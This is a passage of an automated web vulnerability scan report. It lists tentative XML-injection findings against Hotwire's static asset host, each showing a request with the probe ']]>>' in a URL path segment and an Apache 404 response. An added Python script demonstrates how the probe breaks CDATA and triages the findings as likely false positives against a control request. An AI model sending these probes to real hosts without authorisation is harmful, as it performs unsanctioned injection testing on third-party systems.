Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/javascript/core/comp/HwTilesComp.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy/javascript]]>>/core/comp/HwTilesComp.js?ver=185918 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:03 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.32. http://ak-static.hotwirestatic.com/static/deploy/javascript/core/comp/HwTilesComp.js [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/javascript/core/comp/HwTilesComp.js

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy/javascript/core]]>>/comp/HwTilesComp.js?ver=185918 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:07 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.33. http://ak-static.hotwirestatic.com/static/deploy/javascript/core/comp/HwTilesComp.js [REST URL parameter 5]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/javascript/core/comp/HwTilesComp.js

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy/javascript/core/comp]]>>/HwTilesComp.js?ver=185918 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535994
Date: Mon, 03 Oct 2011 01:02:11 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.34. http://ak-static.hotwirestatic.com/static/deploy/javascript/core/comp/HwTilesComp.js [REST URL parameter 6]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/javascript/core/comp/HwTilesComp.js

Issue detail

The REST URL parameter 6 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 6. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy/javascript/core/comp/HwTilesComp.js]]>>?ver=185918 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:16 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.35. http://ak-static.hotwirestatic.com/static/deploy/javascript/hotel/details/HotelDetailsMapContainerComp.js [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/javascript/hotel/details/HotelDetailsMapContainerComp.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/deploy/javascript/hotel/details/HotelDetailsMapContainerComp.js?ver=172705 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535945
Date: Mon, 03 Oct 2011 01:02:27 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.36. http://ak-static.hotwirestatic.com/static/deploy/javascript/hotel/details/HotelDetailsMapContainerComp.js [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/javascript/hotel/details/HotelDetailsMapContainerComp.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy]]>>/javascript/hotel/details/HotelDetailsMapContainerComp.js?ver=172705 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535997
Date: Mon, 03 Oct 2011 01:02:31 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.37. http://ak-static.hotwirestatic.com/static/deploy/javascript/hotel/details/HotelDetailsMapContainerComp.js [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/javascript/hotel/details/HotelDetailsMapContainerComp.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy/javascript]]>>/hotel/details/HotelDetailsMapContainerComp.js?ver=172705 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:34 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.38. http://ak-static.hotwirestatic.com/static/deploy/javascript/hotel/details/HotelDetailsMapContainerComp.js [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/javascript/hotel/details/HotelDetailsMapContainerComp.js

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy/javascript/hotel]]>>/details/HotelDetailsMapContainerComp.js?ver=172705 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:39 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.39. http://ak-static.hotwirestatic.com/static/deploy/javascript/hotel/details/HotelDetailsMapContainerComp.js [REST URL parameter 5]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/javascript/hotel/details/HotelDetailsMapContainerComp.js

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy/javascript/hotel/details]]>>/HotelDetailsMapContainerComp.js?ver=172705 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:41 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.40. http://ak-static.hotwirestatic.com/static/deploy/javascript/hotel/details/HotelDetailsMapContainerComp.js [REST URL parameter 6]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/javascript/hotel/details/HotelDetailsMapContainerComp.js

Issue detail

The REST URL parameter 6 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 6. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy/javascript/hotel/details/HotelDetailsMapContainerComp.js]]>>?ver=172705 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:43 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.41. http://ak-static.hotwirestatic.com/static/images/buttons/btn-book-now-large.gif [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/buttons/btn-book-now-large.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/buttons/btn-book-now-large.gif?ver=222337 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535950
Date: Mon, 03 Oct 2011 01:01:54 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.42. http://ak-static.hotwirestatic.com/static/images/buttons/btn-book-now-large.gif [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/buttons/btn-book-now-large.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/buttons/btn-book-now-large.gif?ver=222337 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:57 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.43. http://ak-static.hotwirestatic.com/static/images/buttons/btn-book-now-large.gif [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/buttons/btn-book-now-large.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/buttons]]>>/btn-book-now-large.gif?ver=222337 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:59 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.44. http://ak-static.hotwirestatic.com/static/images/buttons/btn-book-now-large.gif [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/buttons/btn-book-now-large.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/buttons/btn-book-now-large.gif]]>>?ver=222337 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:02:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:03 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
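
Every finding in this group has the same shape: a ]]>> probe in one path segment, a 404 from Apache, and a response body that begins with an XML declaration. The Python script below is an added example, not part of the XSS.CX report and not Hotwire's code. It shows both sides of the question: cdata_breaks demonstrates why ]]> is the probe, using a hypothetical back-end template that drops a path segment into a CDATA section without escaping (an assumption for illustration, nothing observed on this host), and triage compares the probed response with a control response for the same path carrying a benign junk segment and classifies the finding. The HTTP responses are constructed stand-ins for the snipped 404 pages above; the parser error text in the third one is likewise constructed, to show the case that does deserve a manual look.

```python
"""Triage of tentative 'XML injection' findings raised by a ]]>> probe in a URL path.

Added example; not part of the original report and not Hotwire's code.
"""
import xml.etree.ElementTree as ET

PAYLOAD = "]]>>"  # the probe the scanner appended to each path segment

# Strings a real server-side XML/SOAP parser leaks into an error response.
# An <?xml ...?> declaration at the top of a static XHTML 404 page is not one of them.
XML_ERROR_SIGNATURES = (
    "SAXParseException",
    "XMLSyntaxError",
    "XML parsing error",
    "not well-formed",
    "unterminated CDATA",
    "org.xml.sax",
    "System.Xml.XmlException",
    "javax.xml.stream",
)


def build_lookup_xml(segment: str) -> str:
    """Hypothetical back-end template (an assumption for illustration, not observed on
    ak-static.hotwirestatic.com): a path segment is dropped into a CDATA section
    without escaping, which is exactly the condition the ]]> probe exists to detect."""
    return (
        '<?xml version="1.0"?>'
        '<m:lookup xmlns:m="urn:example:assets">'
        f"<m:path><![CDATA[{segment}]]></m:path>"
        "</m:lookup>"
    )


def cdata_breaks(segment: str) -> bool:
    """True when the document built from `segment` is rejected by the XML parser.
    ']]>' closes the CDATA section early; the template's own ']]>' then sits in
    character data, where it is an invalid token."""
    try:
        ET.fromstring(build_lookup_xml(segment))
        return False
    except ET.ParseError:
        return True


def parse_response(raw: str):
    """Split a raw HTTP/1.1 response into (status code, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    return int(head.split(" ", 2)[1]), body


def triage(control_raw: str, probed_raw: str) -> dict:
    """Classify one finding.

    control_raw: response to the same path with a benign junk segment in place of
                 the payload (the expected 404 for a non-existent static file).
    probed_raw:  response to the path carrying the ]]>> payload.
    Only status and body are compared; headers such as Cache-Control vary per edge.
    """
    c_status, c_body = parse_response(control_raw)
    p_status, p_body = parse_response(probed_raw)

    hit = next((s for s in XML_ERROR_SIGNATURES if s.lower() in p_body.lower()), None)
    if hit is not None:
        return {"verdict": "confirm_manually",
                "reason": f"parser error text in probed response: {hit!r}"}

    if (p_status, p_body) == (c_status, c_body):
        reason = "probed and control responses are identical"
        if p_body.lstrip().startswith("<?xml"):
            reason += ("; the body is a static XHTML error page whose <?xml "
                       "declaration is the only XML in it")
        return {"verdict": "false_positive", "reason": reason}

    return {"verdict": "differs",
            "reason": f"status {c_status} -> {p_status}, "
                      f"body length {len(c_body)} -> {len(p_body)}"}


# Constructed stand-in for the snipped Apache 404 pages in the report above.
ERROR_PAGE = (
    '<?xml version="1.0" encoding="ISO-8859-1"?>\n'
    '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"\n'
    '"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">\n'
    '<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">\n'
    "<head><title>Object not found!</title></head>\n"
    "<body><h1>Object not found!</h1></body></html>\n"
)


def http_response(status_line: str, body: str, extra_headers: str = "") -> str:
    return (f"{status_line}\r\nServer: Apache\r\n"
            "Content-Type: text/html; charset=iso-8859-1\r\n"
            f"{extra_headers}Content-Length: {len(body)}\r\n\r\n{body}")


CONTROL = http_response("HTTP/1.1 404 Not Found", ERROR_PAGE,
                        "Cache-Control: private, max-age=31536000\r\n")
PROBED = http_response("HTTP/1.1 404 Not Found", ERROR_PAGE,
                       "Cache-Control: max-age=0, no-cache, no-store\r\n")
# Constructed response for the case that would deserve manual confirmation.
PROBED_REAL_ERROR = http_response(
    "HTTP/1.1 500 Internal Server Error",
    "<html><body>org.xml.sax.SAXParseException: XML document structures must "
    "start and end within the same entity.</body></html>\n")

if __name__ == "__main__":
    print("probe breaks CDATA parsing:", cdata_breaks("buttons" + PAYLOAD))
    print("finding in the style of 8.44:", triage(CONTROL, PROBED))
    print("real parser error:", triage(CONTROL, PROBED_REAL_ERROR))
```

The control request matters more than the payload: a 404 for a static image path is expected whatever garbage is in the path, so only a response that differs from the control, or that carries parser error text, is worth a human's time. Headers are deliberately left out of the comparison because the Cache-Control values in the findings above alternate between private, max-age=31536000 and no-cache depending on which edge answered, which says nothing about injection.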

8.45. http://ak-static.hotwirestatic.com/static/images/buttons/btn-submit2.png [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/buttons/btn-submit2.png

Issue detail

The payload ]]>> was appended to the value of the REST URL parameter 1 (the path segment static). The scanner reported this as a possible XML injection because the response matched its heuristic for an error in a server-side XML or SOAP parser. The response shown does not support that: it is the host's standard Apache 404 page, the same 1422-byte XHTML document returned for every probe against this host, which merely begins with an XML declaration and contains no parser error message. Treat the finding as unconfirmed until a control request (the same path with a benign junk segment) shows a response that differs from the probed one.

Request

GET /static]]>>/images/buttons/btn-submit2.png?ver=222337 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
